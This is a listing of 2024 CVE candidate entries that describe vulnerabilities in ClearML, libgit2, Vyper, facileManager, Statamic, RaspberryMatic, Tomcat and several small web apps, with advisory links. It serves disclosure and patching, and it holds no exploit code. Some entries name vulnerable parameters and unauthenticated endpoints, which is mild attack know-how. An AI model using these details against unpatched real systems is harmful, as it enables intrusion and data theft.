CVE 2024 24591 Candidate A path traversal vulnerability in versions 1.4.0 to 1.14.1 of the client SDK of Allegro AI’s ClearML platform enables a maliciously uploaded dataset to write local or remote files to an arbitrary location on an end user’s system when interacted with. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
CVE 2024 24590 Candidate Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
CVE 2024 2459 Candidate The UX Flat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/ux-flat/ | URL:https://wordpress.org/plugins/ux-flat/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve Assigned (20240314)
CVE 2024 24579 Candidate stereoscope is a go library for processing container images and simulating a squash filesystem. Prior to version 0.0.1, it is possible to craft an OCI tar archive that, when stereoscope attempts to unarchive the contents, will result in writing to paths outside of the unarchive temporary directory. Specifically, use of `github.com/anchore/stereoscope/pkg/file.UntarToDirectory()` function, the `github.com/anchore/stereoscope/pkg/image/oci.TarballImageProvider` struct, or the higher level `github.com/anchore/stereoscope/pkg/image.Image.Read()` function express this vulnerability. As a workaround, if you are using the OCI archive as input into stereoscope then you can switch to using an OCI layout by unarchiving the tar archive and provide the unarchived directory to stereoscope. MISC:https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204 | URL:https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204 | MISC:https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv | URL:https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv Assigned (20240125)
CVE 2024 24578 Candidate RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based `HMIPServer.jar` component. RaspberryMatric includes a Java based `HMIPServer`, that can be accessed through URLs starting with `/pages/jpages`. The `FirmwareController` class does however not perform any session id checks, thus this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch. MISC:https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h | URL:https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h Assigned (20240125)
CVE 2024 24577 Candidate libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2. FEDORA:FEDORA-2024-605004a28e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/ | FEDORA:FEDORA-2024-8ba389815f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/ | FEDORA:FEDORA-2024-92bac3b909 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/ | FEDORA:FEDORA-2024-993d3a78dd | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/ | FEDORA:FEDORA-2024-a7a3c8ccdd | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/ | MISC:https://github.com/libgit2/libgit2/releases/tag/v1.6.5 | URL:https://github.com/libgit2/libgit2/releases/tag/v1.6.5 | MISC:https://github.com/libgit2/libgit2/releases/tag/v1.7.2 | URL:https://github.com/libgit2/libgit2/releases/tag/v1.7.2 | MISC:https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8 | URL:https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8 | MLIST:[debian-lts-announce] 20240227 [SECURITY] [DLA 3742-1] libgit2 security update | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html Assigned (20240125)
CVE 2024 24575 Candidate libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2. FEDORA:FEDORA-2024-605004a28e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/ | FEDORA:FEDORA-2024-8ba389815f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/ | FEDORA:FEDORA-2024-92bac3b909 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/ | FEDORA:FEDORA-2024-993d3a78dd | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/ | FEDORA:FEDORA-2024-a7a3c8ccdd | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/ | MISC:https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa | URL:https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa | MISC:https://github.com/libgit2/libgit2/releases/tag/v1.6.5 | URL:https://github.com/libgit2/libgit2/releases/tag/v1.6.5 | MISC:https://github.com/libgit2/libgit2/releases/tag/v1.7.2 | URL:https://github.com/libgit2/libgit2/releases/tag/v1.7.2 | MISC:https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v | URL:https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v Assigned (20240125)
CVE 2024 24574 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Unsafe echo of filename in phpMyFAQ\phpmyfaq\admin\attachments.php leads to allowed execution of JavaScript code in client side (XSS). This vulnerability has been patched in version 3.2.5. MISC:https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5 | URL:https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5 | MISC:https://github.com/thorsten/phpMyFAQ/pull/2827 | URL:https://github.com/thorsten/phpMyFAQ/pull/2827 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx Assigned (20240125)
CVE 2024 24573 Candidate facileManager is a modular suite of web apps built with the sysadmin in mind. In versions 4.5.0 and earlier, when a user updates their profile, a POST request containing user information is sent to the endpoint server/fm-modules/facileManager/ajax/processPost.php. It was found that non-admins can arbitrarily set their permissions and grant their non-admin accounts with super user privileges. MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-w67q-pp62-j4pf | URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-w67q-pp62-j4pf Assigned (20240125)
CVE 2024 24572 Candidate facileManager is a modular suite of web apps built with the sysadmin in mind. In versions 4.5.0 and earlier, the $_REQUEST global array was unsafely called inside an extract() function in admin-logs.php. The PHP file fm-init.php prevents arbitrary manipulation of $_SESSION via the GET/POST parameters. However, it does not prevent manipulation of any other sensitive variables such as $search_sql. Knowing this, an authenticated user with privileges to view site logs can manipulate the search_sql variable by appending a GET parameter search_sql in the URL. The information above means that the checks and SQL injection prevention attempts were rendered unusable. MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-xw34-8pj6-75gc | URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-xw34-8pj6-75gc Assigned (20240125)
CVE 2024 24571 Candidate facileManager is a modular suite of web apps built with the sysadmin in mind. For the facileManager web application versions 4.5.0 and earlier, we have found that XSS was present in almost all of the input fields as there is insufficient input validation. MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877 | MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-h7w3-xv88-2xqj | URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-h7w3-xv88-2xqj Assigned (20240125)
CVE 2024 24570 Candidate Statamic is a Laravel and Git powered CMS. HTML files crafted to look like jpg files are able to be uploaded, allowing for XSS. This affects the front-end forms with asset fields without any mime type validation, asset fields in the control panel, and asset browser in the control panel. Additionally, if the XSS is crafted in a specific way, the "copy password reset link" feature may be exploited to gain access to a user's password reset token and gain access to their account. The authorized user is required to execute the XSS in order for the vulnerability to occur. In versions 4.46.0 and 3.4.17, the XSS vulnerability has been patched, and the copy password reset link functionality has been disabled. FULLDISC:20240213 SEC Consult SA-20240212-0 :: Multiple Stored Cross-Site Scripting vulnerabilities in Statamic CMS | URL:http://seclists.org/fulldisclosure/2024/Feb/17 | MISC:http://packetstormsecurity.com/files/177133/Statamic-CMS-Cross-Site-Scripting.html | MISC:https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9 | URL:https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9 Assigned (20240125)
CVE 2024 24569 Candidate The Pixee Java Code Security Toolkit is a set of security APIs meant to help secure Java code. `ZipSecurity#isBelowCurrentDirectory` is vulnerable to a partial-path traversal bypass. To be vulnerable to the bypass, the application must use toolkit version <=1.1.1, use ZipSecurity as a guard against path traversal, and have an exploit path. Although the control still protects attackers from escaping the application path into higher level directories (e.g., /etc/), it will allow "escaping" into sibling paths. For example, if your running path is /my/app/path you an attacker could navigate into /my/app/path-something-else. This vulnerability is patched in 1.1.2. MISC:https://github.com/pixee/java-security-toolkit/blob/7c8e93e6fb2420fb6003c54a741e267c4f883bab/src/main/java/io/github/pixee/security/ZipSecurity.java#L82-L87 | URL:https://github.com/pixee/java-security-toolkit/blob/7c8e93e6fb2420fb6003c54a741e267c4f883bab/src/main/java/io/github/pixee/security/ZipSecurity.java#L82-L87 | MISC:https://github.com/pixee/java-security-toolkit/commit/b885b03c9cfae53d62d239037f9654d973dd54d9 | URL:https://github.com/pixee/java-security-toolkit/commit/b885b03c9cfae53d62d239037f9654d973dd54d9 | MISC:https://github.com/pixee/java-security-toolkit/security/advisories/GHSA-qh4g-4m4w-jgv2 | URL:https://github.com/pixee/java-security-toolkit/security/advisories/GHSA-qh4g-4m4w-jgv2 Assigned (20240125)
CVE 2024 24568 Candidate Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, the rules inspecting HTTP2 headers can get bypassed by crafted traffic. The vulnerability has been patched in 7.0.3. FEDORA:FEDORA-2024-7b063bce0a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/ | FEDORA:FEDORA-2024-bd4eed8466 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/ | MISC:https://github.com/OISF/suricata/commit/478a2a38f54e2ae235f8486bff87d7d66b6307f0 | URL:https://github.com/OISF/suricata/commit/478a2a38f54e2ae235f8486bff87d7d66b6307f0 | MISC:https://github.com/OISF/suricata/security/advisories/GHSA-gv29-5hqw-5h8c | URL:https://github.com/OISF/suricata/security/advisories/GHSA-gv29-5hqw-5h8c | MISC:https://redmine.openinfosecfoundation.org/issues/6717 | URL:https://redmine.openinfosecfoundation.org/issues/6717 Assigned (20240125)
CVE 2024 24567 Candidate Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Vyper compiler allows passing a value in builtin raw_call even if the call is a delegatecall or a staticcall. But in the context of delegatecall and staticcall the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the value= argument. If the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. This vulnerability affects 0.3.10 and earlier versions. MISC:https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100 | URL:https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100 | MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m Assigned (20240125)
CVE 2024 24566 Candidate Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4. MISC:https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd | URL:https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd | MISC:https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37 | URL:https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37 Assigned (20240125)
CVE 2024 24565 Candidate CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1. MISC:https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6 | URL:https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6 | MISC:https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96 | URL:https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96 Assigned (20240125)
CVE 2024 24564 Candidate Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. When using the built-in `extract32(b, start)`, if the `start` index provided has for side effect to update `b`, the byte array to extract `32` bytes from, it could be that some dirty memory is read and returned by `extract32`. This vulnerability affects 0.3.10 and earlier versions. MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-4hwq-4cpm-8vmx | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-4hwq-4cpm-8vmx Assigned (20240125)
CVE 2024 24563 Candidate Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. Arrays can be keyed by a signed integer, while they are defined for unsigned integers only. The typechecker doesn't throw when spotting the usage of an `int` as an index for an array. The typechecker allows the usage of signed integers to be used as indexes to arrays. The vulnerability is present in different forms in all versions, including `0.3.10`. For ints, the 2's complement representation is used. Because the array was declared very large, the bounds checking will pass Negative values will simply be represented as very large numbers. As of time of publication, a fixed version does not exist. There are three potential vulnerability classes: unpredictable behavior, accessing inaccessible elements and denial of service. Class 1: If it is possible to index an array with a negative integer without reverting, this is most likely not anticipated by the developer and such accesses can cause unpredictable behavior for the contract. Class 2: If a contract has an invariant in the form `assert index < x`, the developer will suppose that no elements on indexes `y | y >= x` are accessible. However, by using negative indexes, this can be bypassed. Class 3: If the index is dependent on the state of the contract, this poses a risk of denial of service. If the state of the contract can be manipulated in such way that the index will be forced to be negative, the array access can always revert (because most likely the array won't be declared extremely large). However, all these the scenarios are highly unlikely. Most likely behavior is a revert on the bounds check. MISC:https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541 | URL:https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541 | MISC:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137 | URL:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137 | MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2 | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2 Assigned (20240125)
CVE 2024 24562 Candidate vantage6-UI is the official user interface for the vantage6 server. In affected versions a number of security headers are not set. This issue has been addressed in commit `68dfa6614` which is expected to be included in future releases. Users are advised to upgrade when a new release is made. While an upgrade path is not available users may modify the docker image build to insert the headers into nginx. MISC:https://github.com/vantage6/vantage6-UI/commit/68dfa661415182da0e5717bd58db3d00aedcbd2e | URL:https://github.com/vantage6/vantage6-UI/commit/68dfa661415182da0e5717bd58db3d00aedcbd2e | MISC:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-gwq3-pvwq-4c9w | URL:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-gwq3-pvwq-4c9w Assigned (20240125)
CVE 2024 24561 Candidate Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In versions 0.3.10 and earlier, the bounds check for slices does not account for the ability for start + length to overflow when the values aren't literals. If a slice() function uses a non-literal argument for the start or length variable, this creates the ability for an attacker to overflow the bounds check. This issue can be used to do OOB access to storage, memory or calldata addresses. It can also be used to corrupt the length slot of the respective array. MISC:https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457 | URL:https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457 | MISC:https://github.com/vyperlang/vyper/issues/3756 | URL:https://github.com/vyperlang/vyper/issues/3756 | MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c Assigned (20240125)
CVE 2024 24560 Candidate Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. When calls to external contracts are made, we write the input buffer starting at byte 28, and allocate the return buffer to start at byte 0 (overlapping with the input buffer). When checking RETURNDATASIZE for dynamic types, the size is compared only to the minimum allowed size for that type, and not to the returned value's length. As a result, malformed return data can cause the contract to mistake data from the input buffer for returndata. When the called contract returns invalid ABIv2 encoded data, the calling contract can read different invalid data (from the dirty buffer) than the called contract returned. MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686 | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686 Assigned (20240125)
CVE 2024 24559 Candidate Vyper is a Pythonic Smart Contract Language for the EVM. There is an error in the stack management when compiling the `IR` for `sha3_64`. Concretely, the `height` variable is miscalculated. The vulnerability can't be triggered without writing the `IR` by hand (that is, it cannot be triggered from regular vyper code). `sha3_64` is used for retrieval in mappings. No flow that would cache the `key` was found so the issue shouldn't be possible to trigger when compiling the compiler-generated `IR`. This issue isn't triggered during normal compilation of vyper code so the impact is low. At the time of publication there is no patch available. MISC:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586 | URL:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586 | MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv Assigned (20240125)
CVE 2024 24558 Candidate TanStack Query supplies asynchronous state management, server-state utilities and data fetching for the web. The `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint. To fix this issue, please update to version 5.18.0 or later. MISC:https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1 | URL:https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1 | MISC:https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf | URL:https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf Assigned (20240125)
CVE 2024 24557 Candidate Moby is an open-source project created by Docker to enable software containerization. The classic builder cache system is prone to cache poisoning if the image is built FROM scratch. Also, changes to some instructions (most important being HEALTHCHECK and ONBUILD) would not cause a cache miss. An attacker with the knowledge of the Dockerfile someone is using could poison their cache by making them pull a specially crafted image that would be considered as a valid cache candidate for some build steps. 23.0+ users are only affected if they explicitly opted out of Buildkit (DOCKER_BUILDKIT=0 environment variable) or are using the /build API endpoint. All users on versions older than 23.0 could be impacted. Image build API endpoint (/build) and ImageBuild function from github.com/docker/docker/client is also affected as it the uses classic builder by default. Patches are included in 24.0.9 and 25.0.2 releases. MISC:https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae | URL:https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae | MISC:https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc | URL:https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc Assigned (20240125)
CVE 2024 24556 Candidate urql is a GraphQL client that exposes a set of helpers for several frameworks. The `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream. To fix this vulnerability upgrade to version 1.1.1 MISC:https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d | URL:https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d | MISC:https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w | URL:https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w Assigned (20240125)
CVE 2024 24549 Candidate Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. MISC:https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg | URL:https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg Assigned (20240125)
CVE 2024 24548 Candidate Payment EX Ver1.1.5b and earlier allows a remote unauthenticated attacker to obtain the information of the user who purchases merchandise using Payment EX. MISC:https://jvn.jp/en/jp/JVN41129639/ | URL:https://jvn.jp/en/jp/JVN41129639/ Assigned (20240125)
CVE 2024 24543 Candidate Buffer Overflow vulnerability in the function setSchedWifi in Tenda AC9 v.3.0, firmware version v.15.03.06.42_multi allows a remote attacker to cause a denial of service or run arbitrary code via crafted overflow data. MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0130/setSchedWifi.md Assigned (20240125)
CVE 2024 24539 Candidate FusionPBX before 5.2.0 does not validate a session. MISC:https://github.com/fusionpbx/fusionpbx/commit/2f8bed375c124c1d7e36138acc6903fcfcf15a8f | MISC:https://github.com/fusionpbx/fusionpbx/commit/ee202cd61dc9a79fb2d634b1ad21ff2416d531cb Assigned (20240125)
CVE 2024 2453 Candidate There is an SQL injection vulnerability in Advantech WebAccess/SCADA software that allows an authenticated attacker to remotely inject SQL code in the database. Successful exploitation of this vulnerability could allow an attacker to read or modify data on the remote database. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-081-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-081-01 Assigned (20240314)
CVE 2024 24525 Candidate An issue in EpointWebBuilder 5.1.0-sp1, 5.2.1-sp1, 5.4.1 and 5.4.2 allows a remote attacker to execute arbitrary code via the infoid parameter of the URL. MISC:https://l3v3lforall.github.io/EpointWebBuilder_v5.x_VULN/ Assigned (20240125)
CVE 2024 24524 Candidate Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component. MISC:https://github.com/harryrabbit5651/cms/blob/main/1.md Assigned (20240125)
CVE 2024 24520 Candidate An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place. MISC:http://lepton.com | MISC:https://github.com/xF9979/LEPTON-CMS Assigned (20240125)
CVE 2024 24512 Candidate Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the input subtitle component. MISC:https://drive.google.com/file/d/1jRsltje5PRkgigcY5qLWB3GhF0e9j6aF/view?usp=sharing | MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-24512%20-%3E%20Stored%20XSS%20in%20input%20SubTitle%20of%20the%20Component Assigned (20240125)
CVE 2024 24511 Candidate Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the Input Title component. MISC:https://drive.google.com/file/d/1IhU9tNhc6enKL1Dgq9--R05biJBjodKv/view?usp=sharing | MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-24511%20-%3E%20Stored%20XSS%20in%20input%20Title%20of%20the%20Component Assigned (20240125)
CVE 2024 2450 Candidate Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to correctly verify account ownership when switching from email to SAML authentication, allowing an authenticated attacker to take over other user accounts via a crafted switch request under specific conditions. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240314)
CVE 2024 24499 Candidate SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtfullname and txtphone parameters in the edit_profile.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Update_Profile.md Assigned (20240125)
CVE 2024 24498 Candidate Unrestricted File Upload vulnerability in Employee Management System 1.0 allows a remote attacker to execute arbitrary code via the edit-photo.php component. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-Unauthenticated_Unrestricted_File_Upload_To_RCE.md Assigned (20240125)
CVE 2024 24497 Candidate SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Login.md Assigned (20240125)
CVE 2024 24496 Candidate An issue in Daily Habit Tracker v.1.0 allows a remote attacker to manipulate trackers via the home.php, add-tracker.php, delete-tracker.php, update-tracker.php components. MISC:https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Broken_Access_Control.md Assigned (20240125)
CVE 2024 24495 Candidate SQL Injection vulnerability in delete-tracker.php in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via crafted GET request. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/DailyHabitTracker-SQL_Injection.md Assigned (20240125)
CVE 2024 24494 Candidate Cross Site Scripting vulnerability in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via the day, exercise, pray, read_book, vitamins, laundry, alcohol and meat parameters in the add-tracker.php and update-tracker.php components. MISC:https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Stored_XSS.md Assigned (20240125)
